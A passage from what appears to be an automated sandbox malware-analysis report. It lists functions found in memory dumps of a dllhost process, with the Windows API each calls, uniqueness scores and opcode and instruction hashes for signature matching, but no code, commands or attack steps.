Uniqueness Score: 0.28%

Function 001BA148, Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E38,?,?), ref: 001BA1C2

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 215868f7c7026c25a697ecf020c3f6092ffadfb04445ad6a46c995646432d9db
Instruction ID: 6739d362fc7565f5f090459825118f319fcef43d88db1a92a515ff4c9672587e
Opcode Fuzzy Hash: 215868f7c7026c25a697ecf020c3f6092ffadfb04445ad6a46c995646432d9db
Instruction Fuzzy Hash: E211E6719093806FD311CF15DC45F66BFB8FF85620F09819AED088B642D334B915CBA2

Uniqueness

Uniqueness Score: 0.01%

Function 005B173E, Relevance: 1.6, APIs: 1, Instructions: 62UNIQUE

Download Yara Rule

APIs

GetProcessWorkingSetSize.KERNEL32(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 005B1797

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: ProcessSizeWorking
String ID:
API String ID: 3584180929-0
Opcode ID: f2b961a6b1eca6e5c625fb6a3005c43686c7e4794499ed73c910b563eb122bdd
Instruction ID: d451f993da80491ee211d4b780a4ec3989791bd55d85e93bd56afadc8027f558
Opcode Fuzzy Hash: f2b961a6b1eca6e5c625fb6a3005c43686c7e4794499ed73c910b563eb122bdd
Instruction Fuzzy Hash: 74110476504304AFEB60CF51DC45FA6BB9CEF44324F14846AEA058B642DB74A944CBB5

Uniqueness

Uniqueness Score: 37.75%

Function 005B1822, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetProcessWorkingSetSize.KERNEL32(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 005B187B

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: ProcessSizeWorking
String ID:
API String ID: 3584180929-0
Opcode ID: f2b961a6b1eca6e5c625fb6a3005c43686c7e4794499ed73c910b563eb122bdd
Instruction ID: 807f3370b117dfee2437e31f052248f854a467c6ba06896f83e8328525e2b2ca
Opcode Fuzzy Hash: f2b961a6b1eca6e5c625fb6a3005c43686c7e4794499ed73c910b563eb122bdd
Instruction Fuzzy Hash: DC110172504340AFEB60CF11DC85FA6BBACFF44324F04846AFA058B641D774A904CBB5

Uniqueness

Uniqueness Score: 6.84%

Function 005B1662, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 005B16B8

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: de1f11600a76315ad7999884b992ee3ec8bc4caed15cb320f443405d6158c870
Instruction ID: b0fddebfd33d3fc498be3033c3d082d5fffd31eae1b11083dfe8b722e79d432e
Opcode Fuzzy Hash: de1f11600a76315ad7999884b992ee3ec8bc4caed15cb320f443405d6158c870
Instruction Fuzzy Hash: DC11C171504640AFEB608F15DC85BAABB9CEB44324F1884AAEA058B641D774A9448BB5

Uniqueness

Uniqueness Score: 0.45%

Function 001BB303, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 001BB36E

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 554332a31c87acab15cce0cb0215988acecc4160711552c6def117bc5bd7b13e
Instruction ID: 4612169c636d4c8a482dd40826e3fb1ae66862e1d75ee0a114f1451a1620bfdc
Opcode Fuzzy Hash: 554332a31c87acab15cce0cb0215988acecc4160711552c6def117bc5bd7b13e
Instruction Fuzzy Hash: C6117F72409380AFDB228F51DC44A62FFF4EF4A320F0884DAE9858B562C375A419DB61

Uniqueness

Uniqueness Score: 0.47%

Function 005B0102, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 005B0161

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 3dfd689739b34dac182801d580684d4653389ebf8531595cf404d467e16eb697
Instruction ID: 42a09566b033393e27fdd2c31b0319bb78e92cb3e4a30c3e87c5ce3c928ff0d8
Opcode Fuzzy Hash: 3dfd689739b34dac182801d580684d4653389ebf8531595cf404d467e16eb697
Instruction Fuzzy Hash: 74110172404300AFEB20CF55DC84FA7FBA8EF84324F04885AEA058B692C774B904CBB1

Uniqueness

Uniqueness Score: 0.52%

Function 005B06F6, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000E38,?,?), ref: 005B0772

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: f2c2abc8311dba266245057cd658177cbcac77d5da77bd0399093cda8623daa3
Instruction ID: f59a648e98263c5e71523c380d85afed2a6938dc48ff30d19aeb299c9b89d83c
Opcode Fuzzy Hash: f2c2abc8311dba266245057cd658177cbcac77d5da77bd0399093cda8623daa3
Instruction Fuzzy Hash: 1F11E6719093806FD3158B15CC45F26FFB8EFC6620F09818AE8448B692D225B905CBA2

Uniqueness

Uniqueness Score: 0.11%

Function 001BAC8D, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 001BACEC

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 3a012db8319c609f7b792ca7fb873a0051bc7db79808ccb116268630b1b12b3b
Instruction ID: 08b762e1e852d78cfdeeb805feb8372c2d81d9e6c0ff6271f213cb07ee502c63
Opcode Fuzzy Hash: 3a012db8319c609f7b792ca7fb873a0051bc7db79808ccb116268630b1b12b3b
Instruction Fuzzy Hash: 3E1160714093C05FDB128B65DC44A92BFB4DF47220F0884DAED848F253C365A958CB62

Uniqueness

Uniqueness Score: 0.50%

Function 001BA2D2, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 001BA330

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: e97a5570e2e67fcba536b61c15e10addd4d1bb076e9fa351ec7b952f662836f1
Instruction ID: e462f90c367206b539f624ae8f9b6bec79738673685f3199b406a6d85c460c19
Opcode Fuzzy Hash: e97a5570e2e67fcba536b61c15e10addd4d1bb076e9fa351ec7b952f662836f1
Instruction Fuzzy Hash: D21151754093C46FEB228B15DC44B61BFA4EF47624F0D80DAED848B263D365A809DB72

Uniqueness

Uniqueness Score: 0.01%

Function 005B1366, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 005B13AE

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6c14cb4a4e6f9c97105ce2bbcfbd26936b306581b71827475a492caa8d6b93a3
Instruction ID: cf8d87e9e93f8f8f122643512d45304971d222ddc86393a5c17cd9eb3a62942b
Opcode Fuzzy Hash: 6c14cb4a4e6f9c97105ce2bbcfbd26936b306581b71827475a492caa8d6b93a3
Instruction Fuzzy Hash: 941170725047408FDB60CF59D885B66BBD8EB54220F18C8AAED09CB652E674E804CB65

Uniqueness

Uniqueness Score: 0.02%

Function 001BAE22, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 001BAE6A

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 503bc816feb3574e62e56ebae9c65c00f3494e8a48cc69dbf37586b0b93a3555
Instruction ID: 12002542af61c6517cbc4635818103785f88ab9914e7485b579a60a53c8fc554
Opcode Fuzzy Hash: 503bc816feb3574e62e56ebae9c65c00f3494e8a48cc69dbf37586b0b93a3555
Instruction Fuzzy Hash: 15113075A043409FDB60CF55D885BA6BB98EF44620F08C4AAED49CB651D774E844CA72

Uniqueness

Uniqueness Score: 0.28%

Function 001BBBF0, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 001BBC49

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 85135a0e6effe69d0c350b567916b3e185427f51babc443e51eb7c2d976940a2
Instruction ID: 4ab4f05d2e8a20c586a435d53e6b757dc6eef1dde60fc54e7ec12b202a17c44a
Opcode Fuzzy Hash: 85135a0e6effe69d0c350b567916b3e185427f51babc443e51eb7c2d976940a2
Instruction Fuzzy Hash: 3A1191764093809FDB11CF61DC88B92BFA4EF46320F0980DAED858F163D379A949CB61

Uniqueness

Uniqueness Score: 0.31%

Function 001BB002, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E38,44BE5226,00000000,00000000,00000000,00000000), ref: 001BB055

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 7e2e4b076da7cd71d4c3c9cea76a812d17f88efa186eaed48d43fede807e50f0
Instruction ID: d0cc559b36aa7aac0a1e9e89e512f2d9efa80865b84803509b7dfb382d13978f
Opcode Fuzzy Hash: 7e2e4b076da7cd71d4c3c9cea76a812d17f88efa186eaed48d43fede807e50f0
Instruction Fuzzy Hash: 5401C475508344AEE7209F01DC85BB6B7A8DB84724F148056FE058B642D7A4A944CAB1

Uniqueness

Uniqueness Score: 0.14%

Function 005B12BE, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E38,?,?), ref: 005B130E

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: b95f5bf6546f37a7cc149a314ebf29a1477da8f0c7b1d4b53e422d14cb780ac2
Instruction ID: fc43bc023d47cd1c49efc0645ae0a2f12914a6e163e13a1cb42b41aa564416b5
Opcode Fuzzy Hash: b95f5bf6546f37a7cc149a314ebf29a1477da8f0c7b1d4b53e422d14cb780ac2
Instruction Fuzzy Hash: 4201B172900200AFD350DF16DD45B26FBA8FB88A20F14815AED088BB41D731F915CBE2

Uniqueness

Uniqueness Score: 0.08%

Function 001BA172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E38,?,?), ref: 001BA1C2

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 9c8f13ef964c618a958b544c3fe3512cfe859d6270c5e86a81fcf16fa69717bb
Instruction ID: 12b835c224517cb50a245b07803a17e6a6b52fdbeb6f6ea36e76325b685f75b6
Opcode Fuzzy Hash: 9c8f13ef964c618a958b544c3fe3512cfe859d6270c5e86a81fcf16fa69717bb
Instruction Fuzzy Hash: 7D01B172900200AFD710CF16DD45B26FBA8FB88A20F14815AED088BB41D735F915CBE2

Uniqueness

Uniqueness Score: 0.01%

Function 001BB32A, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 001BB36E

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bacc10b4266cd41d405e66b91860683a6557818f6095b5c537bf6c2e4b2bf2e8
Instruction ID: 45e367d9a0edf27eea16f02c5ee999de5b4c554054f725cc76cce05223813ff3
Opcode Fuzzy Hash: bacc10b4266cd41d405e66b91860683a6557818f6095b5c537bf6c2e4b2bf2e8
Instruction Fuzzy Hash: 02016D32808740DFDB218F55D984B66FBE0FF48720F18C59AEE494AA22C375E414DFA2

Uniqueness

Uniqueness Score: 0.47%

Function 005B02CE, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E38,?,?), ref: 005B031E

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8c0b59867b6a5083cee8f81d870b69c6ea7249ab2ab41225531331509f3bb724
Instruction ID: efb0a7bd3e28a3613710eac189fb301ac01821c67c989ee60c0c46cc8603f389
Opcode Fuzzy Hash: 8c0b59867b6a5083cee8f81d870b69c6ea7249ab2ab41225531331509f3bb724
Instruction Fuzzy Hash: F101A272900201ABD254CF16DD46F26FBA8FBC8B20F14811AED084BB41D771F915CBE6

Uniqueness

Uniqueness Score: 0.03%

Function 005B0722, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000E38,?,?), ref: 005B0772

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 71ff536e6fc135a974f7667c7b7c5cdd26461232c285b088f87be89f9ea1bfb9
Instruction ID: e94d1971c36be6e2e84b277b16f04b3f455311e5019387c5ec2df2ae21b36b01
Opcode Fuzzy Hash: 71ff536e6fc135a974f7667c7b7c5cdd26461232c285b088f87be89f9ea1bfb9
Instruction Fuzzy Hash: FD01A271900201ABD254CF16DD46B26FBA8FBC8A20F148159ED084BB41D731F915CBE6

Uniqueness

Uniqueness Score: 0.11%

Function 001BAD86, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000E38,?,?), ref: 001BADD6

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: cb560db9196339647a9ae9f9ffb9a2ca5888481c6afd8e41f28f93237dd6c59a
Instruction ID: 34384a72e40b201f47d7111d9cd5e508c82d325e3ccd69ef98c040d377951aad
Opcode Fuzzy Hash: cb560db9196339647a9ae9f9ffb9a2ca5888481c6afd8e41f28f93237dd6c59a
Instruction Fuzzy Hash: 2301A272900201ABD254CF16DD46F26FBA8FBC8B20F14811AED084BB41D731F915CBE6

Uniqueness

Uniqueness Score: 0.01%

Function 001BACBA, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 001BACEC

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: c379dadda49718f21127ea655d8f5d85efaba7d2f54bda29d5f5e1b741778a77
Instruction ID: 0ed945061903f76298913d4b5980f9fa60445d34e72303d39f91628db45f8a1f
Opcode Fuzzy Hash: c379dadda49718f21127ea655d8f5d85efaba7d2f54bda29d5f5e1b741778a77
Instruction Fuzzy Hash: BF01D6754043449FDB20CF55D8847A5FFA0EF44335F58C4AADD088B612D374A844CAA2

Uniqueness

Uniqueness Score: 0.50%

Function 001BBC1A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 001BBC49

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 17a801f9c0250d2c7ffc317a0b7059c145b7b0045164e9656be72350a3547d65
Instruction ID: d4a4e71010a47892b2fa81d4743251119a1f83e261f1c82cc9e020a7a3532e1b
Opcode Fuzzy Hash: 17a801f9c0250d2c7ffc317a0b7059c145b7b0045164e9656be72350a3547d65
Instruction Fuzzy Hash: F401D1314083449FDB50CF55E9C9BA1FFA4DF84324F18C0AAED098F612D7B8A944CAA2

Uniqueness

Uniqueness Score: 0.31%

Function 001BA2FE, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 001BA330

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 55601d928acec8ed1cc872a87771a8366cbfc0890c2aef2937e9abc00c8d4ee4
Instruction ID: 79036bedf229e98bd3ec944b53327a5429e69c7759d9ab0e9f8df635b2a007d8
Opcode Fuzzy Hash: 55601d928acec8ed1cc872a87771a8366cbfc0890c2aef2937e9abc00c8d4ee4
Instruction Fuzzy Hash: 40F0C235808344DFDB20CF09D889B61FFE0EF44724F48C09ADD494B722D375A948CAA2

Uniqueness

Uniqueness Score: 0.01%

Function 005B157C, Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 005B15E8

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b55c0ee221b5da901e91d47ed00d20b6be4a17c5ecc255dd2e23316488f68b4d
Instruction ID: e5ceaa9e76a392228889226f24dea56d8b0772d573ae1900f7c8392357a16655
Opcode Fuzzy Hash: b55c0ee221b5da901e91d47ed00d20b6be4a17c5ecc255dd2e23316488f68b4d
Instruction Fuzzy Hash: 7F21C07250D3C05FEB128F25DC54B92BFB4AF47324F0D80DAE8858F663D264A908CB62

Uniqueness

Uniqueness Score: 0.03%

Function 001BA710, Relevance: 1.3, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 001BA780

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: dcf589e2be575a81b91e78fa4a8e158caf81fca4c83aab03ef878288f20c4ee2
Instruction ID: 7011cc7d664dd19c9e9461169cc7765d4c6c8cf186816e2a9783568f945a46a8
Opcode Fuzzy Hash: dcf589e2be575a81b91e78fa4a8e158caf81fca4c83aab03ef878288f20c4ee2
Instruction Fuzzy Hash: 7C21D5B54083809FDB128F25DD85791BFB4EF02324F0880EAED448B253D335A909CB61

Uniqueness

Uniqueness Score: 0.03%

Function 005B15B6, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 005B15E8

Memory Dump Source

Source File: 0000000B.00000002.756420531.005B0000.00000040.00000001.sdmp, Offset: 005B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5b0000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: abdb2400a9ac5847df7c004556d2702816821f80163dd8372dd9c400883ec9f6
Instruction ID: 5e354e4e8ce9927f405b28feae9f85988f7d62d3f95502f93616c11d1c97c1ec
Opcode Fuzzy Hash: abdb2400a9ac5847df7c004556d2702816821f80163dd8372dd9c400883ec9f6
Instruction Fuzzy Hash: 7F01D4759047408FDB60CF55D8847A1FFA4EB44320F08C4AAED098BA52D774E844CAB2

Uniqueness

Uniqueness Score: 0.03%

Function 001BA74E, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 001BA780

Memory Dump Source

Source File: 0000000B.00000002.756039324.001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ba000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1dfbf855f903ce209ded7c9b8b6370fa49750b70c018e01363774c7283ea44c5
Instruction ID: 5bca42b8d1ba1b42cedb70cb5d541f76ad3443a80bdbf445a937df87c19fe59d
Opcode Fuzzy Hash: 1dfbf855f903ce209ded7c9b8b6370fa49750b70c018e01363774c7283ea44c5
Instruction Fuzzy Hash: 2701F2755083409FDB20CF15D9897A5FBA4DF44320F08C0ABED098B712DB75E844CAA2

Uniqueness

Uniqueness Score: 0.03%

Function 00120A2C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.755977503.00120000.00000040.00000040.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_120000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b08dccf6fe5a9d49b7d8fde4fe3308861b5d75368cb911da164da9100ede521
Instruction ID: 8e193b5ce0b98944d49f85c6d9fec0ea9a82da4f41900d35685253b5bf2663b0
Opcode Fuzzy Hash: 8b08dccf6fe5a9d49b7d8fde4fe3308861b5d75368cb911da164da9100ede521
Instruction Fuzzy Hash: 0A11D2342083849FC716CB10E984F26BBA1EB99718F24CA9CE94907653C77BDC53CA91

Uniqueness

Uniqueness Score: 0.00%

Function 001209FF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.755977503.00120000.00000040.00000040.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_120000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d1694795da30911f2ca8541b7593dca32d17642a21191c98b47998809eb9e8b
Instruction ID: 2355e3567373eb9b4a130c24c4cb17c70f5470e6f9e15cf49b6337efca4b546f
Opcode Fuzzy Hash: 2d1694795da30911f2ca8541b7593dca32d17642a21191c98b47998809eb9e8b
Instruction Fuzzy Hash: F22124311087C48FC712CB20D990B55BFB1AF5A318F1986DEE8884B6A3D33A9917CB52

Uniqueness

Uniqueness Score: 0.00%

Function 001207FF, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.755977503.00120000.00000040.00000040.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_120000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d49a4ea589d466c2b94799baf7cd9fd5e809b42dc1724a816de90ce9448769e5
Instruction ID: 009753ad7418fa5f7aba0a443049a05d1971cc7e7e41c0a2ccc37b5c73dd45af
Opcode Fuzzy Hash: d49a4ea589d466c2b94799baf7cd9fd5e809b42dc1724a816de90ce9448769e5
Instruction Fuzzy Hash: EEF044B65097846FD7118F06AC44862FFA8EF86630709C49FFD498B612D225B908CB72

Uniqueness

Uniqueness Score: 0.00%

Function 00120AE8, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.755977503.00120000.00000040.00000040.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_120000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf6f97c7a6fa3c5b49b622662c44ff3f4885e1bc3a7ddbf93b842e6a7428365c
Instruction ID: 293b5eebe89e5cf86fcbc8e7a6e8cfc8b114e424c3661fe94003b231bb9ddfa7
Opcode Fuzzy Hash: cf6f97c7a6fa3c5b49b622662c44ff3f4885e1bc3a7ddbf93b842e6a7428365c
Instruction Fuzzy Hash: A7F01D35104644DFC316CB00D540B16FBA2EB89718F24C6ADE94917752C337D823DA81

Uniqueness

Uniqueness Score: 0.00%

Function 0012081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.755977503.00120000.00000040.00000040.sdmp, Offset: 00120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_120000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8b9754207025b5c99db4d04721f403639298f1485ffa440b30b685a64f0b9f
Instruction ID: 59d9b9deea7f6b34c01da8c6b37718bd9b73e335792cc269066e597f5da62ac8
Opcode Fuzzy Hash: 4e8b9754207025b5c99db4d04721f403639298f1485ffa440b30b685a64f0b9f
Instruction Fuzzy Hash: 0AE09276A047448B9650CF0AFC41462F794EBC4A30B18C07FEC0D8B711D635B544CAA1

Uniqueness

Uniqueness Score: 0.00%

Function 001B23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.756031535.001B2000.00000040.00000001.sdmp, Offset: 001B2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1b2000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48442454c2be169abf1627e62e624875c2f899a245169163f25a1f831403eec0
Instruction ID: 90503844d52c11730499e3c3aa9ac6df6f3277f328acc45eb0817ad46ada6186
Opcode Fuzzy Hash: 48442454c2be169abf1627e62e624875c2f899a245169163f25a1f831403eec0
Instruction Fuzzy Hash: F7D05E793096914FD3168A1DC1A8FD57B94AF91B05F5644FAE800CBAA3C378D985D300

Uniqueness

Uniqueness Score: 0.00%

Function 001B23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.756031535.001B2000.00000040.00000001.sdmp, Offset: 001B2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1b2000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbb3da5a0f41680cdb3618d6fe8b6b2864e1682afcd67db771208d97ad2c7302
Instruction ID: be3f3031fe24962771aca5e7a8a17b55aa211edb07b6e16968c5f0ca1c5b8595
